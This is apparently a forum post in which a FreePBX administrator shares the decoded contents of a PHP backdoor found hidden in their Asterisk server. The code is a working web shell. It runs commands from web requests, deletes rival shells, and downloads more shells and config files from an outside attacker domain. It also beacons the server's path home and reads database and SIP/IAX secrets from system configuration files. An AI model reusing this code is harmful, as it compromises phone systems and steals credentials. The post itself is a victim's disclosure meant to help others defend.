I don’t know if this is of any interest or not, or if this is an appropriate place to post this (or if there is any such place) or if you’re already aware of it, but I found the following code hidden away in this file: ./admin/i18n/vamp/vamp.php, which specifically targets asterisk & freepbx systems. It was hidden under a base64 decode function. I’m not quite sure how they got in - other than perhaps through apache somehow, but I suppose I’m pretty screwed at this point. I thought someone else might benefit from this knowledge. It goes well beyond what’s here, this is just an interesting piece of it.
Not sure I completely understand what it’s doing, other than installing backdoors and grabbing passwords, but apparently the site “egrep.info”, which was created just last month, is the source of some of the code. Maybe somebody wants to pick up the ball and run them down in cooperation with appropriate authorities. whois shows:
Registrant Street: C/O ID#10760, PO Box 16
Registrant City:Nobby Beach
Registrant State/Province:Queensland
Registrant Postal Code:QLD 4218
Registrant Country:AU
Registrant Phone:+45.36946676
but the rest is privacy protected. I suppose it’s possible they’re also just an innocent victim, but my gut feeling says no.
The email address [email protected] is also associated with the below cracker.
if (isset($_REQUEST[‘p’]) && (md5($_REQUEST[‘p’])==“a84cf956b0d0a139eab752a3e09405c4”))
{
@system($_REQUEST[‘c’]);
echo “vampire access” ;
echo “\r\n” ;
}
else
{
die (‘No direct script access allowed’);
}
if ( $_GET[‘pbx’] == “fuck” ) {
remove all indexs
@system(“find . -perm 550 -type d |xargs chmod 755”) ;
@system(“find … -perm 550 -type d |xargs chmod 755”) ;
@system(“find . -perm 555 -type d |xargs chmod 755”) ;
@system(“find … -perm 555 -type d |xargs chmod 755”) ;
@system(“find . -name index.php ! -path ./index.php -delete”) ;
@system(“find … -name index.php ! -path …/index.php ! -path …/admin/index.php ! -path …/recordings/index.php -delete”) ;
echo “Index’s Removed” ;
echo “\r\n” ;
remove other hacks
@system(“rm -rf ./modules/cdr/assets/cdrphp.php ./assets/js/views/index.php ./assets/index.php ./modules/cdr/assets/index.php ./modules/cdr/assets/css/cdr.php ./hel$”) ;
@system(“find . -type f -exec grep -l ‘eFalcon’ {} ; |xargs rm -rf”) ;
@system(“find … -type f -exec grep -l ‘eFalcon’ {} ; |xargs rm -rf”) ;
@system(“grep -r -l --exclude=config.php --exclude=vamp.php --exclude=vampire.php ‘@system’ * | xargs rm -rf”) ;
@system(“grep -r -l --exclude=config.php --exclude=vamp.php --exclude=vampire.php ‘@system’ … | xargs rm -rf”) ;
@system(“grep -r -l --exclude=config.php --exclude=vamp.php --exclude=functions.inc.php --exclude=vampire.php ‘system(\$’ … | xargs rm -rf”) ;
@system(“find . -type f -exec grep -l ‘i-Hmx’ {} ; |xargs rm -rf”) ;
@system(“find …/ -type f -exec grep -l ‘i-Hmx’ {} ; |xargs rm -rf”) ;
@system(“find . -type f -exec grep -r -l --exclude=vamp.php --exclude=vampire.php ‘c99shell’ {} ; |xargs rm -rf”) ;
@system(“find … -type f -exec grep -l --exclude=vamp.php --exclude=vampire.php ‘c99shell’ {} ; |xargs rm -rf”) ;
@system(“find . -type f -exec grep -l 'bas”.“e64”."_decode’ {} ; |xargs rm -rf") ;
@system(“find …/ -type f -exec grep -l 'bas”.“e64”."_decode’ {} ; |xargs rm -rf") ;
@system(“find … -type f -exec egrep -r -l ‘Matrix’ {} ; |xargs rm -rf”) ;
@system(“find … -type f -exec egrep -r -l ‘c999shell’ {} ; |xargs rm -rf”) ;
@system(“find … -type f -exec egrep -r -l ‘9shell’ {} ; |xargs rm -rf”) ;
@system(“find … -name ‘*.php’ -exec egrep -r -l --exclude=crypt.php --exclude=Growl.php --exclude=callerid.php ‘base64_decode’ {} ; |xargs rm -rf”) ;
echo “Hacks Removed” ;
echo “\r\n” ;
add directories
@system("mkdir ./modules/themes ./modules/lang ./modules/vamp ./assets/themes ./assets/lang ./assets/vamp ./i18n/themes ./i18n/lang ./i18n/vamp …/recordings/lang …/recordings/themes …/recordings/vamp ") ;
echo “Own Dir Applied” ;
echo “\r\n” ;
modify .htaccess
@system(“wget -q http://egrep.info/hta.txt -O .htaccess”);
@system("cp -rf .htaccess ./modules/ ;cp -rf .htaccess ./modules/themes/ ; cp -rf .htaccess ./modules/lang/ ; cp -rf .htaccess ./assets/ ; cp -rf .htaccess ./helpers/ ; cp -rf .htaccess ./i18n/ ; cp -rf .htaccess …/recordings/ ; cp -rf .htaccess …/recordings/themes ; cp -rf .htaccess …/recordings/vamp ");
echo “HTA Applied” ;
echo “\r\n” ;
add own indexs
@system(“touch ./modules/index.php ./helpers/index.php ./modules/themes/index.php ./modules/lang/index.php ./modules/vamp/index.php ./assets/themes/index.php ./assets/lang/index.php ./assets/vamp/index.php ./assets/index.php ./i18n/themes/index.php ./i18n/lang/index.php ./i18n/vamp/index.php ./i18n/index.php …/recordings/themes/index.php …/recordings/lang/index.php …/recordings/vamp/index.php”) ;
echo “New index’s Applied” ;
echo “\r\n” ;
custome shell upload
@system(“wget -q http://egrep.info/case.txt -O case.php”);
@system(“cp -rf case.php ./modules/themes/case.php ; cp -rf case.php ./assets/themes/case.php ; cp -rf case.php ./i18n/themes/case.php ; cp -rf case.php …/recordings/themes/case.php ; cp -rf case.php ./modules/vamp/case.php ; cp -rf case.php …/recordings/vamp/case.php ; cp -rf case.php ./assets/vamp/case.php ; cp -rf case.php ./i18n/vamp/case.php; cp -rf case.php …/case.php”) ;
@system(“rm -rf case.php”) ;
echo “Custome Shell Applied”;
echo “\r\n” ;
add user & remove others
@system("wget -q http://egrep.info/ass.txt -O ass.php ; php ass.php ; rm -rf ass.php ") ;
@system(“wget -q http://egrep.info/ass.pass -O lang.php”) ;
@system("cp -rf lang.php ./modules/lang/lang.php ; cp -rf lang.php ./assets/lang/lang.php ; cp -rf lang.php ./i18n/lang/lang.php ; cp -rf lang.php …/recordings/lang/lang.php ; cp -rf lang.php ./modules/vamp/lang.php ; cp -rf lang.php …/recordings/vamp/lang.php ; cp -rf lang.php ./assets/vamp/lang.php ; cp -rf lang.php ./i18n/vamp/lang.php ");
@system(“rm -rf lang.php”) ;
echo “NEW PASSWORD Applied”;
echo “\r\n” ;
adding vamp
@system(“wget http://egrep.info/vampire.txt -O vamp.php”);
@system(“cp -rf vamp.php ./modules/vamp/vamp.php ; cp -rf vamp.php ./assets/vamp/vamp.php ; cp -rf vamp.php ./i18n/vamp/vamp.php ; cp -rf vamp.php …/recordings/vamp/vamp.php”);
echo “vamp Applied”;
@system(“rm -rf vamp.php”);
echo “\r\n” ;
secure exploit
@system(“wget -q http://egrep.info/ass.config -O config.php”) ;
echo “Config.php Updated”;
echo “\r\n” ;
add more exploits
@system(“wget -q http://egrep.info/ex.txt -O ex.php”) ;
@system(“cp -rf ex.php ./assets/js/index.php ; cp -rf ex.php ./helpers/index.php ; cp -rf ex.php ./i18n/es_ES/index.php ; cp -rf ex.php ./images/index.php ; cp -rf ex.php ./modules/cdr/index.php; cp -rf ex.php …/ex.php”) ;
@system(“rm -rf ex.php”);
echo “EXploit Applied”;
echo “\r\n” ;
secure directories
@system("chmod a-w ./modules/themes ./modules/vamp ./modules/lang ./assets/themes ./assets/vamp ./assets/lang ./i18n/themes ./i18n/vamp ./i18n/lang …/recordings/themes …/recordings/vamp …/recordings/lang ");
@system("chmod a-w ./assets/js ./i18n/es_ES/ ");
echo “Dir Secured”;
echo “\r\n” ;
}
if ( $_GET[‘vamp’] == “update” ) {
@system(“wget -q http://egrep.info/vampire.txt -O vamp.php”);
echo " new Vamp Applied";
echo “\r\n” ;
echo “+++++++ Please Refuck ++++++”;
echo “\r\n” ;
}
if ( $_GET[‘mode’] == “lite” ) {
@system(“wget -q http://egrep.info/control.php?path=".$_SERVER[‘SERVER_PORT’].$_SERVER[‘PHP_SELF’]." -O /dev/null”);
}
else {
@system(“wget -q http://egrep.info/control.php?path=".$_SERVER[‘SERVER_PORT’].$_SERVER[‘PHP_SELF’]." -O /dev/null”);
$ampdata=shell_exec('grep -i “AMPDB|PASS” /etc/amportal.conf | grep -v “#” | tr “\n” “"’);
if ( $_GET[‘parse’] == “parse” ) {
echo $ampdata;
echo “\r\n”;
echo "”;
}
$sipdata=shell_exec(‘echo “-----SIP-----” && cat /etc/asterisk/sip_additional.conf | grep “[|secret|host=|type=|username=” | tr “\n” “"’);
$iaxdata=shell_exec('echo “-----IAX-----” && cat /etc/asterisk/iax_additional.conf | grep “[|secret|host=|type=|username=” | tr “\n” "”’);
$zapdata1=shell_exec(‘echo “------zap-----” && cat /etc/asterisk/dahdi-channels.conf | grep “line=|group=|callerid=|context=|channel” | tr “\n” “"’);
$zapdata2=shell_exec('cat /etc/asterisk/chan_dahdi_additional.conf | grep “line=|group=|callerid=|context=|channel” | tr “\n” "”’);
if ( $_GET[‘asterisk’] == “show” ) {
echo $sipdata."\r\n*".$iaxdata."\r\n".$zapdata1."\r\n*".$zapdata2."\r\n*";
}
}